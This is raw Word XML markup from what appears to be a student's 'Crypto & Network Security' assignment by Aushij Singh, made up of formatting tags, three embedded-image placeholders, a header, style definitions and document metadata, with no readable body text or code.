          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C5E538" w14:textId="143DBCC6" w:rsidR="00684A2B" w:rsidRPr="006E5C69" w:rsidRDefault="00684A2B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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF7D27E" wp14:editId="27610B0F">
            <wp:extent cx="5731510" cy="3448685"/>
            <wp:effectExtent l="0" t="0" r="254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A21E" w14:textId="47899D44" w:rsidR="00677714" w:rsidRPr="006E5C69" w:rsidRDefault="00677714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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63A4E0A7" wp14:editId="1B19E275">
            <wp:extent cx="5731510" cy="3140075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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03BC" w14:textId="400C1A88" w:rsidR="005F0B9B" w:rsidRPr="006E5C69" w:rsidRDefault="005F0B9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B62AD52" wp14:editId="4608E3A1">
            <wp:extent cx="5731510" cy="2475865"/>
            <wp:effectExtent l="0" t="0" r="254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0B9B" w:rsidRPr="006E5C69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9493E6" w14:textId="77777777" w:rsidR="00472AE7" w:rsidRDefault="00472AE7" w:rsidP="00472AE7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="645E9921" w14:textId="77777777" w:rsidR="00472AE7" w:rsidRDefault="00472AE7" w:rsidP="00472A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39A7D" w14:textId="77777777" w:rsidR="00472AE7" w:rsidRDefault="00472AE7" w:rsidP="00472AE7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6FF21144" w14:textId="77777777" w:rsidR="00472AE7" w:rsidRDefault="00472AE7" w:rsidP="00472A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24982" w14:textId="20B23CD4" w:rsidR="00472AE7" w:rsidRPr="00472AE7" w:rsidRDefault="00472AE7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      </w:rPr>
      <w:t>AUSHIJ SINGH</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
      </w:rPr>
      <w:tab/>
      <w:t>CRYPTO &amp; NETWORK SECUTITY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DD0"/>
    <w:rsid w:val="00071C54"/>
    <w:rsid w:val="000D3A72"/>
    <w:rsid w:val="001718B7"/>
    <w:rsid w:val="0026266B"/>
    <w:rsid w:val="002A27F7"/>
    <w:rsid w:val="00314FF4"/>
    <w:rsid w:val="003243CE"/>
    <w:rsid w:val="00395FAD"/>
    <w:rsid w:val="003C08A4"/>
    <w:rsid w:val="003E26B5"/>
    <w:rsid w:val="00472AE7"/>
    <w:rsid w:val="004766CA"/>
    <w:rsid w:val="00485684"/>
    <w:rsid w:val="004B5624"/>
    <w:rsid w:val="005F0B9B"/>
    <w:rsid w:val="00677714"/>
    <w:rsid w:val="00684A2B"/>
    <w:rsid w:val="006B2F8A"/>
    <w:rsid w:val="006C17B9"/>
    <w:rsid w:val="006E5C69"/>
    <w:rsid w:val="006F0D6D"/>
    <w:rsid w:val="00730335"/>
    <w:rsid w:val="007667D7"/>
    <w:rsid w:val="007714F3"/>
    <w:rsid w:val="007A2CC9"/>
    <w:rsid w:val="0082364E"/>
    <w:rsid w:val="008D1703"/>
    <w:rsid w:val="009F78FE"/>
    <w:rsid w:val="00A44199"/>
    <w:rsid w:val="00A96F72"/>
    <w:rsid w:val="00BA236F"/>
    <w:rsid w:val="00BB6C69"/>
    <w:rsid w:val="00BC31D4"/>
    <w:rsid w:val="00D202ED"/>
    <w:rsid w:val="00D26405"/>
    <w:rsid w:val="00D55A51"/>
    <w:rsid w:val="00DB7DD0"/>
    <w:rsid w:val="00E40762"/>
    <w:rsid w:val="00E679F7"/>
    <w:rsid w:val="00E67AEC"/>
    <w:rsid w:val="00EE6C56"/>
    <w:rsid w:val="00FA1B78"/>
    <w:rsid w:val="00FE4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5ECF7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1B90F635-BEB5-4086-A3D5-6A2A94D85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k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F0D6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2A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2AE7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00472A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2AE7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006F0D6D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6F0D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9</Pages>
  <Words>342</Words>
  <Characters>1951</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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Aushij Singh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aushij Singh</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-10T00:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-10T05:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>